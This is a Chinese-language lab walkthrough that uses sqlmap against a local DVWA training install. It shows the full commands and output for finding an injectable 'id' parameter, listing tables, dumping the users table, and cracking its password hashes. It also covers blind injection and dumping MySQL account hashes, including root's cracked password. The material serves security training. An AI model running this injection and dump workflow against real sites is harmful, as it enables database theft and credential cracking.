DVMW+sqlmap
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。
所以一个矛一个盾,正好感受一下sql注入。
DVWA 的安装就不详细介绍了,需要PHP/apache/mysql
sqlmap是开源的,可以在github上找到。
DVWA 的安装就不详细介绍了,需要PHP/apache/mysql
sqlmap是开源的,不需要安装,可以在github上找到。
下面是体验步骤:
一、查找注入点
1.
打开wireshark,监视lo网卡(因为是本机)
2.
在DVWA的SQL Injection页面上有一个userid输入框,随便输入然后点击submit
3.
在wireshark中可以找到GET信息
其中有Request URI和Cookie信息
4.
使用sqlmap查找注入点
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"
得到可能的注入点是id,数据库是mysql
[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
二、开始脱裤
1.
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db
得到当前数据库名
current database: 'dvwa'
2.
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db --tables -Ddvwa
使用dvwa库得到表名
点击(此处)折叠或打开
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
3.
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T guestbook --columns
得到guestbook的表结构
点击(此处)折叠或打开
Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| comment | varchar(300) |
| comment_id | smallint(5) unsigned |
| name | varchar(100) |
+------------+----------------------+
得到users表结构
点击(此处)折叠或打开
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+------------+-------------+
4.
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T users --dump
得到users表的内容
点击(此处)折叠或打开
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
| 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 | admin | admin |
| 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown | Gordon |
| 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b | Me | Hack |
| 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso | Pablo |
| 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith | Bob |
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
5.
同命令4,在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。
点击(此处)折叠或打开
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin |
| 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
| 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack |
| 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |
| 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
6.
此时,DVWA的sql injection任务完成。
DVWA的 sql blind injection 任务也是一样用以上方法,在最开始查找注入点的时候会提示id为盲注点
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"
得到id为'AND boolean-based blind - WHERE or HAVING clause' 注入点的信息:
[INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Surname: admin")
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --passwords
使用sqlmap自带的字典可以破解出数据库用户的密码
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *C76DD9894107EB85B2E15ADD4DDA15G7E3C6E98F
[*] root [1]:
password hash: *3800D13EE725ED411CBC3F23B2A2E19C64CE0BEC
clear-text password: passwordABC